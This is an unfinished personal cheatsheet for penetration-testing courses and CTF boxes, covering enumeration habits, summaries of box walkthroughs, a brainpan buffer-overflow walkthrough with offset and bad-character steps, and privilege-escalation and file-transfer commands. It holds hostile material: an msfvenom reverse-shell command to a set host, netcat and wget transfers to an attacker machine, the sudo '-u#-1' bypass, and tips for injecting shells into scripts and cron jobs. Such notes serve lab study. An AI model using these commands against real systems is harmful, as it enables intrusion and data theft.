Taken from many sources, scavenged from around the web. UNFINISHED cheatsheet for several courses. Covers commands, tools, scripts, definitions etc
Last Updated: July 17, 2021
**make each section a separate cheatsheet and remove the catering to OSCP**
Enumeration
Penetration testers are judged by the quality of their enumeration skills and methods.
Techniques
- creativity, persistence, patience, curiosity
- have strategies ready on how to improvise, adapt and overcome
- never assume
- lateral enumeration (know when to move on or jump back and forth, prevents rabbit holes)
- MOVE ON: brute force 5 min, exploit technique 20 min
- research ability
- understand common/expected processes/services on machines to spot anomalies
- repetition & practice & INTUITION to root/system; I'm talking 120+ boxes
- low hanging fruit (ports 21, 80, 445, "unusual ports like abyss?")
- research all platforms and versions found
- web apps last: look at debugger files first, manipulate cookies and search bars, hover over directories
- try the simple stuff first (misconfigurations, default creds (lazy admins), changing passwords, weak permissions)
- (local) if enum scripts/manual searches are empty refer to original attack vector
- develop trusted methodology (no service or technology will be the same, must learn to adapt and use same strategy)
- look for shared folders/drives/repositories/containers between HTTP/SMB/Git and containers
- enumerate first, covering all avenues of possibility and things of interest, before exploitation; collect all information first
- do not get used to a certain style of box, CTF-y and finding specific puzzles to privesc
- Domain Names (both external and internal)
- Check every single port if it really hosts the service you are thinking
- Don't make any assumptions on services and versions
- Specific IPs reachable by internet and unreachable outside the local network/box/environment (pivoting)
- Access control mechanisms, system architectures, intrusion detection systems
- local enumeration of the system (user and group names, logs, system banners, routing tables, SNMP information)
- DNS entries
- nested credentials
Box Enumeration Results (user/footholds/pivoting before root/admin)
- year of the pig
- usernames via SMB, brute force website, search bar sanitizes input and encodes with base64 shown via HTTP headers, encode shell with base64 and send with repeater through JSON value for initial access
- nmap full scan finds IIS webserver port 49663 with same directory as SMB share, they have common link + SMB is writable leads to aspx webshell
- ftp server with anonymous login has binary creds file, convert to ASCII and/or unpickle contents of file and format with python leads to initial foothold, lateral movement from ps aux finds user python file to copy and decode with uncompyle6, file has SWX (7321) creds to copy user SSH keys
- nmap reveals JSONP endpoints, a type of XSS attack that doesn't verify requests, with dirsearch finding login.js page indicating login bypass by setting cookie to SessionToken. Spoofing cookie from login.js page reveals SSH key and username, cracked with ssh2john
- enum reveals domain controller running kerberos/ldap, usernames found on webserver & kerbrute validates 3/6. SMB required password brute force with custom wordlist using cewl and smbpasswd to change. SMB lists 2 specific shares associated with printers. MSRPC enumdomusers reveals service printer account and enumprinters reveals account password for evil-winrm.
- dirsearch reveals /content with specific webserver platform name. searchsploit platform reveals method of obtaining creds in .sql file, crack hashed password for login. PHP Code execution in Ads subsection for reverse shell
- dirsearch shows /panel and /uploads for file upload bypass with PHP file. PHP files blocked but similar PHTML files allowed for reverse shell.
- SMB enum finds .exe in unique share, nmap finds webserver on port 31337 accepting unauthorized input, testing with nc confirms, analyzing exe with immunity debug reveals buffer overflow (offset, bad chars, JMP ESP, msfvenom shellcode) for user shell
- FTP server contains .exe and .dll to be extracted and analyzed for buffer overflow system shell
- dirsearch finds /bin directory with .exe to analyze with immunity debug for user shell
- wpscan for valid admin username, brute force with rockyou and edit website 404.php theme for initial shell, enum shows local port 8080 running with user creds found in /opt for SSH tunnel, docker escape with brute forcing local webserver and shell with javascript console
- subversion port 3690 with website revision repo, repo contains alt domain name and .db file with usernames, svn checkout revision 2 for powershell file with website creds, clone repo in Azure DevOps for aspx shell and commit to new domain for initial shell, lateral movement from winPEAS showing mounted W: drive with svn repos, conf directory contains password (valid username in \Users)
- answer to password reset question in fake employee picture filename, platform found on site with CVE, SMB with creds has .deb of platform, CVE explains to capture user hash with responder by locally running .deb using creds and domain, injecting XSS payload, crack hash for evil-winrm
- nmap full/UDP scan shows SNMP 161, onesixtyone for community string to use with snmp-check shows username, brute force smb with rockyou for password to use with evil-winrm
- enum shows likely domain controller with DNS/LDAP/KER, dig shows unsecured dynamic DNS updates to impersonate server, dirsearch finds .pfx certificate & pfx2john extracts password, openssl extracts contents and impersonates key/cert, nsupdate to add DNS record, responder to capture user hash for web powershell console
- python website icon reveals /account directory that points to /search source code which uses encoded_cookie deserialized with python, initial shell with PoC edited to decode UTF-8 and send GET request with shell cookie, escape docker by SSH tunnel to brute force SSH on host using website usernames
- SQL injection through dev tools cookie value to write hex encoded cmd PHP shell to website directory, download PHP reverse shell with cmd for initial access, lateral movement to user with forensic analysis log containing plaintext SSH password
- hidden web directory with write permissions, upload PHP shell
- webserver on port 8080, platform & version CVE, public exploit upload nc executable
- union based SQLi to username and hashed password
- webserver port 8080 with default creds, command injection with powershell
- sensitive data (creds) found on SMB samba server, login to webserver to find platform & version CVE for LFI and reverse PHP shell
- FTP platform & version number revealed from searchsploit to download and mount file system for ssh keys
- SMB share w/ AD usernames, lateral movement by pivoting with TGT hashes/unique RPC password permissions, download another share with LSASS dumped hashes to pass the hash with evil-winrm
- port 8080 home webpage displays platform & version CVE for system escalation RCE with PHP reverse shell through command injection
- brute forcing webserver admin account with hydra http-post-form (login page, request body, error message) leads to platform & version for file upload (shell)
- showmount port 2049 NFS reveals website backup folder with mount permissions, contents reveal platform & version CVE that needs creds, creds found via strings in .sdf binary database
- default nmap scripts reveal eternalblue exploit, found public script
- contact page on home webpage reveals platform & version CVE for public script. unstable shell so send cmd with nc
- blog on webpage reveals a poem that alludes to a popular culture character, syntax revealed on other post and password on /robots.txt
- platform found and version found from searching where its located, leads to CVE for SQLi leads to creds
- creds found via hacked social media in pastebin, brute force pop3 with hydra for valid account, find 2 messages with temp password, one account valid
- dirsearch reveals platform & CVE (authenticated), googling leads to default creds, specific platform tool & nullbyte article how to get a shell, can upload any file with curl, PHP reverse shell
- wordpress server, bruteforce with wpscan for user creds, privesc with searchsploit wordpress privesc for profile update with ure_other_roles=administrator
- website with .pcap file, multiple connections from client, knock ports with knock && nmap, knock again for now open port leads to hidden directory, repeats process for hidden message with next port numbers spaced??, repeat process leads to knock && ssh revealing creds, ssh creds /bin/sh
- unique subdirectory with LFI prereqs, new technique requires keyword to read, attempting to read system file appends with .php extension and include() function leads to PHP filter LFI to decode source code which reveals way to read system files and log poisoning to upload shell
- wordpress server wpscan bruteforce for creds, edit obscure PHP extension for PHP reverse shell
- webserver platform & version number reveal CVE SQLi public python script that returns hash with salt
- dirsearch webserver reveal sitemap subdirectory with hidden ssh folder with id_rsa keys, username found in homepage source code
- webserver platform & version leads to CVE reverse shell
techniques like lateral scanning, rabbit holes, knowing when to move on, what to look for (hostnames, IPs, users, hidden directories, default creds, config files, platforms, versions, misconfigurations, system details/anomalies etc)
application specific names (Apache, CMS Simple, CUPPA etc)
cewl custom wordlist
Linux
enum4linux -A <ip>
Windows
Scripting
Python
A script to test which file extensions are allowed to be uploaded to a website (link it)
list relevant things like abusing libraries, pickling/data serialization, link exploit dev
Bash
Web Application Attacks
Website Enumeration
first steps: dev tools, search bar, cookies/JSON values, unexpected behavior, source code, images, filenames, types of requests, loaded objects. OWASP
Here we can transfer the exe to a Windows 10 VM and use Immunity Debugger. Make sure the VM is running on a NAT network and port 9999 is open. Run brainpan.exe, attach to it in Immunity Debugger, press play, and begin finding the offset. A quick nmap scan verifies the port is reachable; if it is not, open the port in the firewall.
We need to fuzz the program to determine at which point the EIP gets overwritten. We can use pattern_create.rb -l 800 to generate a unique string and use nc to open a socket and send the string to the listening executable. Initially I tried 800 characters after doing some manual testing.
nc -v 10.0.2.15 9999
Let's load this in Immunity Debugger, repeat the command, and fetch the overwritten instruction pointer (EIP)
We can see the EIP value of 35724134, which we pass to pattern_offset to obtain the offset
pattern_offset.rb -q 35724134
We have an offset of 524, so the first 524 bytes are filler (A's or a NOP sled), followed by the JMP ESP address, a short NOP sled for the remainder bytes, and then the shellcode: payload = "\x90" * 524 + "JMP ESP" + "\x90" * remainder bytes + shellcode
Identifying Bad Characters
Use the following script to print the full byte table (the candidate bad chars) and send its output with nc 10.0.2.15 9999
#!/usr/bin/env python
from __future__ import print_function
# print every byte value \x00..\xff as an escaped string, on one line
for x in range(0, 256):
    print("\\x" + "{:02x}".format(x), end='')
print()
Right click on the stack pointer (ESP) and choose Follow in Dump. We can use mona to list the bad chars by running !mona bytearray followed by !mona compare -a esp -f bytearray.bin
We can see the only bad character is "\x00"
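How pattern_offset and !mona compare arrive at the two results above, as an added Python example (not from the original notes or from the tools themselves): it rebuilds the Metasploit cyclic pattern, looks up the EIP value, and diffs the sent byte table against a constructed memory dump; the dump bytes and the dropped/altered-byte cases are assumptions for illustration.

```python
import string
import struct

def msf_pattern(length):
    """Rebuild the Metasploit cyclic pattern that pattern_create.rb emits: triples of
    (uppercase, lowercase, digit) with the digit advancing fastest, so any 4 bytes are
    unique within the first 20280 characters."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]

def pattern_offset(eip_value, length=800):
    """What pattern_offset.rb -q does: the debugger shows EIP as a number (0x35724134)
    but the bytes sit in memory little-endian, so pack it that way and search for the
    4-character needle. Returns -1 if the value did not come from the pattern."""
    needle = struct.pack("<I", eip_value).decode("latin-1")
    return msf_pattern(length).find(needle)

def badchars_sent(exclude=()):
    """The byte table the script above prints, minus bytes already known to be bad."""
    return bytes(b for b in range(256) if b not in exclude)

def find_bad_chars(sent, dump):
    """What !mona compare reports: walk the sent table against the bytes found at ESP.
    The first byte that differs is bad. If the rest of the table resurfaces later in
    the dump the walk resumes there (a single dropped or altered byte); if it does
    not, everything after the bad byte was lost (a NUL ending a string copy) and the
    remaining bytes can only be judged by re-running with this one excluded."""
    bad = []
    i = j = 0
    while i < len(sent):
        if j < len(dump) and dump[j] == sent[i]:
            i += 1
            j += 1
            continue
        bad.append(sent[i])
        i += 1
        probe = sent[i:i + 4]             # resynchronise on the next few sent bytes
        k = dump.find(probe, j) if probe else -1
        if k < 0:
            break
        j = k
    return bad

if __name__ == "__main__":
    print("offset:", pattern_offset(0x35724134))     # 524 on brainpan
    # Constructed dump: the copy stopped at the first byte (\x00), so only stale
    # stack contents (assumed 0xcc filler) are visible at ESP.
    stale = b"\xcc" * 16
    print("bad:", ["\\x%02x" % b for b in find_bad_chars(badchars_sent(), stale)])
```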
Finding JMP ESP Address
In order to obtain the address of a JMP ESP instruction to redirect execution into the stack pointer (ESP), we can use the command !mona jmp -r esp (manually install mona.py into the PyCommands folder)
We see our address is 0x311712F3 which in little endian syntax will be \xF3\x12\x17\x31
Generating shellcode for a reverse shell is straightforward: run the following msfvenom command and pass in the bad characters we found
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.6.18.145 LPORT=53 -f c -b "\x00"
Initial Access
The number of remainder bytes depends on the size of the buffer; by trial and error the usual NOP sled length is 20 bytes. We now have all of the attributes needed to exploit this buffer overflow and gain a reverse shell: listen on port 53 and run the program with python brainpan.py
In infosec there are often debates about what exactly a vulnerability, an exploit or a software bug is and where one term begins and the other ends.
Bugs
Programming errors, usually defined and named; they exist in both software and hardware. Examples:
- Buffer overflow
- Race condition
- Access violation
- Infinite loop
- Division by zero
- Off-by-one error
- Null pointer dereference
- Input validation error
- Resource leak
Vulnerabilities
Software bugs which can be taken advantage of to achieve unintended or unanticipated behaviour; there is, at least in theory, a way to exploit them. Examples:
- BlueKeep
- Shellshock
- Dirty COW
- Heartbleed
- EternalBlue
Exploits
Code or techniques that take advantage of a vulnerability. Examples:
- SQL injection
- Code injection
- Directory traversal
- XSS, CSRF, SSRF
- RCE (remote code execution)
- ACE (arbitrary code execution)
- Authentication bypass
- Critical info exposed
- Denial of Service
- Privilege escalation
- Feature bypass
- User session takeover
- Malicious file upload
- Man-in-the-middle
Not all public exploits are friendly; as demonstrated below, some of them contain code that acts maliciously towards the person running them. It is vital to inspect every part of unverified code for hidden malice before executing it.
GTFOBins is a curated list of Unix binaries that an attacker can abuse to bypass local security restrictions: breaking out of restricted shells, escalating or maintaining elevated privileges, transferring files, spawning bind and reverse shells, and facilitating other post-exploitation tasks.
start here and explain the differences of bug, vulnerability and exploit
I have to find a method of troubleshooting when exploits are known to work with a certain vulnerability.
File Transfers & Data Exfiltration
don't forget to always chmod 700 tools/programs on Linux
start a python server with python3 -m http.server 80, then on the victim cd /tmp and wget http://<attackerIP>/<locationOfTool> (or simply navigate via browser and download)
curl/http
Netcat
nc -lvnp <port> < fileName: on Kali, serve the file to the victim
nc <attackerIP> <port> > exploitPath: on the victim, receive the file
- exploited SUID permissions via gtfobins
- LinEnum finds hidden webserver to local port forward in to, platform & version CVE to make custom PoC script
- pspy64 OS enum displays cronjob backup script with tar * wildcard
- SUID files displays non-binary file. searching with strings reveals using commands without full PATH, PATH manipulated for root shell
- sudo permission for yum, shell obtained via GTFObins
- uname -a reveals kernel (3.13/4.14), searchsploit for kernel version reveals public exploit to shell, transfer with nc and compile
- sudo -l cat privileges
- user belongs to group with permissions over python library modules, add code to send shell via socket in popular module like os/sys
- sudo -l for env but stuck in docker env, searching for executable scripts reveals a backup script with full permissions. add nc shell echo command
- SUID nmap binary can start interactive mode and start shell
- SUID vim spawn bash shell
- sudo permission for wget, send flag or /etc/passwd file to attacker to add user as root
- website homepage reveal location for root credentials within server
- sudo permissions for python command with specific program, edit program to include python shell
- ssh keys need passphrase for key, ssh2john.py program converts the keys to be cracked with john
- sudo permissions for specific executable that accepts pickled base64 input. call bash shell, pickle and base64 encode it to get root
- cronjob downloads script from overpass.thm and pipes to bash. /etc/hosts is writable so can spoof overpass.thm as attacker and create reverse shell script with same name for root privesc
- sudo -l for specific privilege on perl program. Program calls bash script that we have read/write privileges for. Overwrite bash script with reverse shell for root privesc
- python SUID, gtfobins for root privesc
- sudo privileges with anansi_util found from gtfobins: sudo anansi_util manual man then !/bin/bash
- escape docker container with root creds in /opt directory for SSH
- lateral movement with sudo & read/write privileges for python file, spoof owner & move original file, create new python reverse shell with filename. sudo SETENV privilege with another python file that imports library, add bash shell to file with library name and set tmp path with PYTHONPATH for root shell
- enum shows port running internally, SSH tunnel to access Gitea webserver but 2FA omits creds. Disable 2FA by enum finding .db & use python sqlite3 to delete 2FA table in .db, user creds lead to repo and Git Hooks for reverse shell. escape container by finding shared folder & transfer host bash shell with nc from user SSH session to container shared folder, chmod shell and run on user SSH for root privesc
- sudo permissions w/o secure path for shutdown, strings with binary shows it calls poweroff, spoof bash shell with poweroff and set permanent PATH for root
- year of the pig
There exists a vulnerability in sudo versions < 1.8.28, CVE-2019-14287. Any user can run a command as root using the command below; it only works if you've been granted sudo permissions for that command as a non-root user.
sudo -u#-1 <commandOrBin>
Kernel/system information
uname -a
ls -la /etc | grep release
/etc/issue
/etc/*-release
/etc/lsb-release # Debian based
/etc/redhat-release # Redhat based
/proc/version
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
Root processes
ps aux | grep root
SUID files
find / -perm /4000 -type f -exec ls -lda {} \; 2>/dev/null
- SeImpersonatePrivilege permits PrintSpoofer.exe, system/DC escalation with mayor precompiled exe using reverse shell .exe
- SeLoadDriverPrivilege enabled, whoami /priv doc reveals necessities of Print Operators group which checks out, found git repo with .sys, .bat and two .exe files. made new reverse shell .exe and transferred via SMB for system privesc
- Firefox.lnk file (reference to original) on Desktop points to hidden location with .db, .sqlite and .json files to extract admin password with firefox_decrypt for psexec pass hash system shell
- using original Azure DevOps devops.worker.htb with new creds to make new starter pipeline, adding a line to include the user as an admin
- unique directory in c:\ with powershell script using Invoke-Expression cmdlet (arbitrary command execution) on hosts file, lateral movement to file owner with Account Operator group privilege to change password. add new user, smb with lateral creds to get hosts file and append command with new user as admin, remove old file, re-upload and evil-winrm with new user
- checking "C:\$Recycle.bin\userSID" contains system.bak and sam.bak files, make c:\temp to transfer and download with evil-winrm, crack with secretsdump.py
- powershell to download winPEAS, finds Unquoted Service path, replace with reverse shell executable (msfvenom)
- script file on home AD system with unique syntax leads to DiskShadow NTDS.dit extraction (had to find custom DS script) on cloned snapshot to pass admin hash
- winPEAS reveals multiple instances of windows scheduler running, checking the log of systemscheduler reveals executable called by admin with full permissions, shell with msfvenom and download via smbserver to same PATH
- PowerUp script reveals service permissions vulnerability with invoke-serviceabuse, allows us to run any command with system privileges, download msfvenom shell with certutil
- executable file in downloads folder reveals CVE public exploit. exploit uses python on system, OS doesn't have python installed so local port forwarding with plink.exe is necessary. BO (buffer overflow) so manually send cmd with nc with msfvenom in hex
- user can access GUI control panel & change permissions and view hidden files. Hidden folder reveals admin password
- executable file on desktop leads to CVE buffer overflow
go back over windows CTFs for whoami /priv practice
CMD/Powershell commands
cls: clears the screen
dir: equivalent to ls
dir <filename> /s: lists the path of the file
type: equivalent to cat
net user: lists all users on system
net user <user>: lists permissions & info about <user>
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"